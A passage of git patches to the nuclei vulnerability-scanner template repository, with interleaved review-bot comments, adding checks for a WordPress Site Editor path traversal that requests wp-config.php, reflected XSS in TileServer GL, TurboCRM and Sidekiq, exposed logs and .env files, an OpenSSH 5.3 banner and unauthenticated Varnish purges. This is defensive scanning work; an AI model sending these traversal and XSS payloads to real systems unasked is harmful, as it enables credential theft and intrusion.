56/79] Added CVE-2018-7422 --- cves/2018/CVE-2018-7422.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-7422.yaml diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml new file mode 100644 index 0000000000..0662aac51c --- /dev/null +++ b/cves/2018/CVE-2018-7422.yaml 
@@ -0,0 +1,27 @@ +id: CVE-2018-7422 + +info: + name: WordPress Site Editor Plugin LFI + author: LuskaBol + severity: high + tags: cve,cve2018,wordpress,wp-plugin,lfi + description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + reference: https://www.exploit-db.com/exploits/44340 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From b5dab216c57760589ed16e8f6a34a5f960372d54 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 15:50:35 +0530 Subject: [PATCH 57/79] wp workflow update --- workflows/wordpress-workflow.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 48e27c3964..a81be966be 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -14,6 +14,7 @@ workflows: - template: cves/2016/CVE-2016-10033.yaml - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml + - template: cves/2018/CVE-2018-7422.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml - template: cves/2019/CVE-2019-9978.yaml From 2c0574af170ddb4e0798d626f81f0fc94d5091c9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 10:22:51 +0000 Subject: [PATCH 58/79] Auto Update README [Sun Apr 11 10:22:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 581d4ef04a..a6dafc8f94 100644 
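Review bot: The request in the new template asks the vulnerable endpoint for `../../../../../../../wp-config.php` and then expects `DB_NAME` and `DB_PASSWORD` in the body, but if `ajax_path` feeds a PHP include — the usual meaning of a Local File Inclusion in a `.php` endpoint — the target executes wp-config.php instead of returning it, the `define()` calls print nothing, and the matcher stays silent on a vulnerable site. The public PoC for this CVE, as far as I recall, reads `/etc/passwd` for exactly that reason; `ajax_path=/etc/passwd` with a `regex` matcher on `root:.*:0:0:` would both work and avoid pulling live database credentials into scan output should a site actually expose source. If the wp-config.php probe is kept, note in `description` that WordPress also supports placing wp-config.php one directory above the web root, where this traversal depth misses it.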
--- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 267 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 268 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 921 files**. +**95 directories, 922 files**. From b05c8f402b8fca1bc26bad5665e2b80ebae76240 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 16:12:21 +0530 Subject: [PATCH 59/79] Added CVE-2020-15500 --- cves/2020/CVE-2020-15500.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2020/CVE-2020-15500.yaml diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml new file mode 100644 index 0000000000..6a0066e483 --- /dev/null +++ b/cves/2020/CVE-2020-15500.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-15500 + +info: + name: TileServer GL Reflected XSS + author: Akash.C + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + source: https://github.com/maptiler/tileserver-gl/issues/461 + tags: cve,cve2020,xss,tileserver + +requests: + - method: GET + path: + - '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + part: body + - '">' \ No newline at end of file From 5b6d64d13f2aaf331afbfc96fb42659bb3880cf2 Mon Sep 17 00:00:00 2001 
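Review bot: The last matcher in the new CVE-2020-15500 template is not valid YAML as written — `words:` is left empty, `part: body` follows it, and the `- '">…'` item then has no sequence to belong to — so nuclei will fail to load the template rather than run it. Reorder the entry to `- type: word` / `part: body` / `words:` / `- '"><script>alert(document.domain);</script>'`, i.e. the decoded form of the `key=` payload (the matched string appears truncated to `'">'` in this rendering, so check the actual file). I do not believe `source:` is a recognised `info` field; fold that issue URL into `reference` so it is not silently dropped.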
From: GitHub Action Date: Sun, 11 Apr 2021 10:44:03 +0000 Subject: [PATCH 60/79] Auto Update README [Sun Apr 11 10:44:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a6dafc8f94..7fa4c82f8b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 268 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 269 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 922 files**. +**95 directories, 923 files**. From 45197abd9651660820fdff54ca8daaa999736a4e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 16:23:53 +0530 Subject: [PATCH 61/79] Added access-log-file --- exposures/logs/access-log.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/logs/access-log.yaml diff --git a/exposures/logs/access-log.yaml b/exposures/logs/access-log.yaml new file mode 100644 index 0000000000..bb9debe657 --- /dev/null +++ b/exposures/logs/access-log.yaml @@ -0,0 +1,27 @@ +id: access-log-file + +info: + name: Publicly accessible access-log file + author: sheikhrishad + severity: low + tags: log + +requests: + - method: GET + path: + - "{{BaseURL}}/access.log" + + matchers-condition: and + matchers: + - type: word + words: + - '"GET /' + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 
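Review bot: The new access-log template has no `description`, and its tag set `log` alone is inconsistent with the sibling log template on this page, whose tags are `laravel,log,exposure`; add `exposure` so it is selected with the rest of the exposure set, and add a sentence on what the finding gives an attacker: `description: A web server access log is publicly readable. Access logs typically contain client IP addresses, full request URLs (including any tokens or session identifiers passed in query strings), referrers and user agents.` With that in mind `low` is defensible only for a log with no sensitive query strings, so `medium` is worth considering. The `text/plain` header check also means logs served as `application/octet-stream` or without a content type are missed — either note the limitation or drop the header matcher and rely on the `"GET /` body signature plus status 200.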
From cfa8cbfb206100a93c677bd4043a0df04da4b6ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 10:57:26 +0000 Subject: [PATCH 62/79] Auto Update README [Sun Apr 11 10:57:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7fa4c82f8b..f0bf0d4e85 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 269 | vulnerabilities | 120 | exposed-panels | 118 | -| takeovers | 67 | exposures | 69 | technologies | 60 | +| takeovers | 67 | exposures | 70 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 923 files**. +**95 directories, 924 files**. From 862862f27708cfd07721b0a48f1b20f66244f8db Mon Sep 17 00:00:00 2001 From: Chintan Gurjar Date: Sun, 11 Apr 2021 12:37:22 +0100 Subject: [PATCH 63/79] Removed blank lines --- default-logins/nagios/nagios-default-credential.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/default-logins/nagios/nagios-default-credential.yaml b/default-logins/nagios/nagios-default-credential.yaml index 998433526c..e582f205aa 100644 --- a/default-logins/nagios/nagios-default-credential.yaml +++ b/default-logins/nagios/nagios-default-credential.yaml @@ -1,12 +1,10 @@ id: nagios-default-credentials - info: name: Nagios Default Credentials Check author: iamthefrogy severity: high tags: nagios,default-login reference: https://www.nagios.org - requests: - method: GET path: 
@@ -23,4 +21,4 @@ requests: words: - 'Current Status' - 'Reports' - condition: and \ No newline at end of file + condition: and From d96746d1937e0424181f6e66cc1ef77c7962df5b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 17:24:54 +0530 Subject: [PATCH 64/79] minor update --- vulnerabilities/other/turbocrm-xss.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml index ade2003039..88e7d47165 100644 --- a/vulnerabilities/other/turbocrm-xss.yaml +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -10,16 +10,21 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E' + - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers-condition: and matchers: - type: word words: - - '">' + - '">' part: body + - type: word + part: header + words: + - "text/html" + - type: status status: - - 200 + - 200 \ No newline at end of file From 9ebc28ced9cf0d7b5123293d672131bfe5857b14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 11:56:05 +0000 Subject: [PATCH 65/79] Auto Update README [Sun Apr 11 11:56:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f0bf0d4e85..f9e39eb183 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 269 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 269 | vulnerabilities | 121 | exposed-panels | 118 | | takeovers | 67 | exposures | 70 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 924 files**. +**95 directories, 925 files**. From b0b45dd599b81dc911385c94ab87051eb0202e2a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 17:51:41 +0530 Subject: [PATCH 66/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index f9fc1c8820..9f93b76ad6 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -8,7 +8,7 @@ info: reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 - tags: cve,cve2021,xss + tags: cve,cve2021,xss,sidekiq requests: - method: GET @@ -20,7 +20,12 @@ requests: part: body words: - "onmouseover=\"alert('nuclei')" + - type: word part: header words: - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 609e54c116ded37fb155473a9db6b2cd7baa88e9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 12:26:12 +0000 Subject: [PATCH 67/79] Auto Update README [Sun Apr 11 12:26:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f9e39eb183..d048ef4341 100644 --- a/README.md 
+++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 269 | vulnerabilities | 121 | exposed-panels | 118 | +| cves | 270 | vulnerabilities | 121 | exposed-panels | 118 | | takeovers | 67 | exposures | 70 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 925 files**. +**95 directories, 926 files**. From f691f574d6375c09f36e7a6ed57799def579db51 Mon Sep 17 00:00:00 2001 From: Chintan Gurjar Date: Sun, 11 Apr 2021 14:02:20 +0100 Subject: [PATCH 68/79] detect openssh5.3 --- network/openssh5.3-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 network/openssh5.3-detect.yaml diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml new file mode 100644 index 0000000000..ac9f67fc5b --- /dev/null +++ b/network/openssh5.3-detect.yaml @@ -0,0 +1,23 @@ +id: OpenSSH-5.3-detect + +info: + name: OpenSSH 5.3 Detection + author: iamthefrogy + severity: low + tags: network, openssh + + + +# OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities with below 2 CVEs +# -------------------------------------------------------------------------------------------- +# http://seclists.org/fulldisclosure/2016/Jul/51 +# https://security-tracker.debian.org/tracker/CVE-2016-6210 +# http://openwall.com/lists/oss-security/2016/08/01/2 + +network: + - host: + - "{{Hostname}}:22" + matchers: + - type: word + words: + - "SSH-2.0-OpenSSH_5.3" From f2a26c1ca4ea25fa36fa9bce3acd3368f121d849 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 18:39:42 +0530 Subject: [PATCH 69/79] Update openssh5.3-detect.yaml --- network/openssh5.3-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index ac9f67fc5b..4f36183403 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -5,7 +5,6 @@ info: author: iamthefrogy severity: low tags: network, openssh - # OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities with below 2 CVEs From 795fedc6027373edf56dee04fe305eb449f0a189 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 18:46:48 +0530 Subject: [PATCH 70/79] minor updates --- network/openssh5.3-detect.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index 4f36183403..74ca96c63b 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml 
@@ -1,22 +1,21 @@ -id: OpenSSH-5.3-detect +id: openssh-5.3-detect info: name: OpenSSH 5.3 Detection author: iamthefrogy severity: low - tags: network, openssh - - -# OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities with below 2 CVEs -# -------------------------------------------------------------------------------------------- -# http://seclists.org/fulldisclosure/2016/Jul/51 -# https://security-tracker.debian.org/tracker/CVE-2016-6210 -# http://openwall.com/lists/oss-security/2016/08/01/2 + tags: network,openssh + description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. + reference: | + - http://seclists.org/fulldisclosure/2016/Jul/51 + - https://security-tracker.debian.org/tracker/CVE-2016-6210 + - http://openwall.com/lists/oss-security/2016/08/01/2 network: - host: + - "{{Hostname}}" - "{{Hostname}}:22" matchers: - type: word words: - - "SSH-2.0-OpenSSH_5.3" + - "SSH-2.0-OpenSSH_5.3" \ No newline at end of file From c6c93b4a4fea75f120af4027f25f13145c39db9d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 14:01:31 +0000 Subject: [PATCH 71/79] Auto Update README [Sun Apr 11 14:01:31 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d048ef4341..b048feaf54 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 926 files**. +**95 directories, 927 files**. From 352dd36c51bae1860db37d7c2b90c98c2c5fe43a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 19:55:27 +0530 Subject: [PATCH 72/79] Update laravel-telescope.yaml --- exposures/logs/laravel-telescope.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
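Review bot: The new `description` states that OpenSSH 5.3 "is vulnerable" on the strength of the banner alone, but `SSH-2.0-OpenSSH_5.3` is also the banner of long-term-support distributions that commonly keep the version string while backporting security fixes, so a banner match is a version hint, not a confirmed vulnerability. Reword to make that explicit and fix the typo: `description: Detects an OpenSSH 5.3 version banner. Unpatched 5.3 is affected by username enumeration (CVE-2016-6210) and DoS issues, but distributions often backport fixes without changing the banner, so verify before reporting.` The word match on `SSH-2.0-OpenSSH_5.3` also covers `OpenSSH_5.3p1`, the common real-world form, so the matcher itself is fine.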
diff --git a/exposures/logs/laravel-telescope.yaml b/exposures/logs/laravel-telescope.yaml index 01854df18c..1b07954008 100644 --- a/exposures/logs/laravel-telescope.yaml +++ b/exposures/logs/laravel-telescope.yaml @@ -6,7 +6,7 @@ info: description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. reference: https://laravel.com/docs/8.x/telescope severity: medium - tags: laravel,disclosure + tags: laravel,disclosure,log requests: - method: GET From 31bfe36b60c75b4c66216a8847c2eb6b87a184ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 14:26:06 +0000 Subject: [PATCH 73/79] Auto Update README [Sun Apr 11 14:26:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b048feaf54..137e9d778b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 270 | vulnerabilities | 121 | exposed-panels | 118 | -| takeovers | 67 | exposures | 70 | technologies | 60 | +| takeovers | 67 | exposures | 71 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 927 files**. +**95 directories, 928 files**. From 1ceb80dfd37c62c73ecc50a16fc03e0ab0a4f30c Mon Sep 17 00:00:00 2001 
From: Dieter Van der Stock Date: Sun, 11 Apr 2021 16:32:06 +0200 Subject: [PATCH 74/79] Set laravel log exposure severity to high. Add description and reference. --- exposures/logs/laravel-log-file.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/logs/laravel-log-file.yaml b/exposures/logs/laravel-log-file.yaml index 75b47eac0b..2b2334e881 100644 --- a/exposures/logs/laravel-log-file.yaml +++ b/exposures/logs/laravel-log-file.yaml @@ -3,7 +3,9 @@ id: laravel-log-file info: name: Laravel log file publicly accessible author: sheikhrishad & geeknik - severity: low + severity: high + description: The log file of this Laravel web app is publicly accessible. This might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. + reference: https://laravel.com/docs/master/logging tags: laravel,log,exposure requests: From 99cdbe8c5ebc1988afb07516204d3316cf56890a Mon Sep 17 00:00:00 2001 From: Dieter Van der Stock Date: Sun, 11 Apr 2021 16:35:07 +0200 Subject: [PATCH 75/79] Up severity on public .env file and add description and reference --- exposures/configs/laravel-env.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 7d775e8148..3611ef1763 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -1,9 +1,11 @@ id: laravel-env info: - name: Laravel .env file + name: Laravel .env file accessible author: pxmme1337 & dwisiswant0 & geeknik & emenalf - severity: medium + severity: critical + description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible. + reference: https://laravel.com/docs/master/configuration#environment-configuration tags: config,exposure requests: From cb58bffb8251adb1aebbcf7f1542357d7a220739 Mon Sep 17 00:00:00 2001 
From: Dieter Van der Stock Date: Sun, 11 Apr 2021 16:35:27 +0200 Subject: [PATCH 76/79] Shorten description on laravel-log-file a bit --- exposures/logs/laravel-log-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/laravel-log-file.yaml b/exposures/logs/laravel-log-file.yaml index 2b2334e881..7ec45fa9ac 100644 --- a/exposures/logs/laravel-log-file.yaml +++ b/exposures/logs/laravel-log-file.yaml @@ -4,7 +4,7 @@ info: name: Laravel log file publicly accessible author: sheikhrishad & geeknik severity: high - description: The log file of this Laravel web app is publicly accessible. This might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. + description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. reference: https://laravel.com/docs/master/logging tags: laravel,log,exposure From bae3ee19e6006901085e01c0a5aeabe7fca937d6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 20:50:42 +0530 Subject: [PATCH 77/79] template update --- .../unautneicated-cache-purge.yaml | 27 +++++++++++++++++++ vulnerabilities/varnish-cache.yaml | 16 ----------- 2 files changed, 27 insertions(+), 16 deletions(-) create mode 100644 misconfiguration/unautneicated-cache-purge.yaml delete mode 100644 vulnerabilities/varnish-cache.yaml diff --git a/misconfiguration/unautneicated-cache-purge.yaml b/misconfiguration/unautneicated-cache-purge.yaml new file mode 100644 index 0000000000..1b6197e612 --- /dev/null +++ b/misconfiguration/unautneicated-cache-purge.yaml 
@@ -0,0 +1,27 @@
+id: unauthenticated-cache-purge
+info:
+  name: Varnish Unauthenticated Cache Purge
+  author: 0xelkomy
+  severity: low
+  description: As per guideline oen should protect purges with ACLs from unauthorized hosts.
+  reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
+  hackerone: https://hackerone.com/reports/154278
+  tags: varnish,misconfig,cache
+
+requests:
+  - method: PURGE
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '200 Purged'
+          - '"status": "ok"'
+        condition: or
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/vulnerabilities/varnish-cache.yaml b/vulnerabilities/varnish-cache.yaml
deleted file mode 100644
index 2a83f05ffd..0000000000
--- a/vulnerabilities/varnish-cache.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: vanish-detect
-info:
-  name: Vanish Cache Detection
-  author: 0xelkomy
-  severity: low
-requests:
-  - raw:
-      - |
-        PURGE / HTTP/1.1
-
-    matchers:
-      - type: dsl
-        name: multi-req
-        dsl:
-          - 'contains(body_1, "200 Purged") == true'
-        req-condition: true

From b0d7059c02a5e54c1c14361bbac0a3765b054840 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sun, 11 Apr 2021 15:22:32 +0000
Subject: [PATCH 78/79] Auto Update README [Sun Apr 11 15:22:32 UTC 2021] :robot:

---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 137e9d778b..3bc0dab6c8 100644
--- a/README.md
+++ b/README.md
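Review bot: The second word in the new template's body matcher, `'"status": "ok"'`, combined with `condition: or`, is not a Varnish signal at all — any JSON-speaking origin that treats an unknown method like GET and answers 200 with a `{"status": "ok"}` body will satisfy both matchers, so the misconfiguration gets reported against hosts with no cache in front of them; `200 Purged` is Varnish's stock synthetic response and is the only reliable indicator here, so either drop the second word or pair it with a Varnish-specific header match such as `- type: word`, `part: header`, `words: ["X-Varnish", "Via: 1.1 varnish"]` under the existing `matchers-condition: and`. The template id is `unauthenticated-cache-purge` while the file is created as `unautneicated-cache-purge.yaml`; templates in this repository are conventionally named after their id, and the misspelled filename will otherwise live on (the follow-up commit in this series only fixes the description typo, not the filename). This check is also not passive: a positive result means the target's root object was actually evicted from the cache, which the description should state so operators can opt out of it on production scans, e.g. `description: Varnish accepts PURGE requests from arbitrary hosts; purges should be restricted with an ACL. Note that a positive result means this check evicted the cached root object.`. I am not certain `hackerone:` is a field the template schema validates — if it is not, folding that URL into `reference` keeps it from being silently ignored.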
@@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
 | cves | 270 | vulnerabilities | 121 | exposed-panels | 118 |
 | takeovers | 67 | exposures | 71 | technologies | 60 |
-| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 |
+| misconfiguration | 56 | workflows | 27 | miscellaneous | 20 |
 | default-logins | 21 | exposed-tokens | 33 | dns | 8 |
 | fuzzing | 7 | helpers | 6 | iot | 11 |

-**95 directories, 928 files**.
+**95 directories, 929 files**.

From 0d85374b645a8b5a810094ae513a5ce25461b19a Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 11 Apr 2021 21:13:24 +0530
Subject: [PATCH 79/79] Update unautneicated-cache-purge.yaml

---
 misconfiguration/unautneicated-cache-purge.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/misconfiguration/unautneicated-cache-purge.yaml b/misconfiguration/unautneicated-cache-purge.yaml
index 1b6197e612..459ab72757 100644
--- a/misconfiguration/unautneicated-cache-purge.yaml
+++ b/misconfiguration/unautneicated-cache-purge.yaml
@@ -3,7 +3,7 @@ info:
   name: Varnish Unauthenticated Cache Purge
   author: 0xelkomy
   severity: low
-  description: As per guideline oen should protect purges with ACLs from unauthorized hosts.
+  description: As per guideline one should protect purges with ACLs from unauthorized hosts.
   reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
   hackerone: https://hackerone.com/reports/154278
   tags: varnish,misconfig,cache
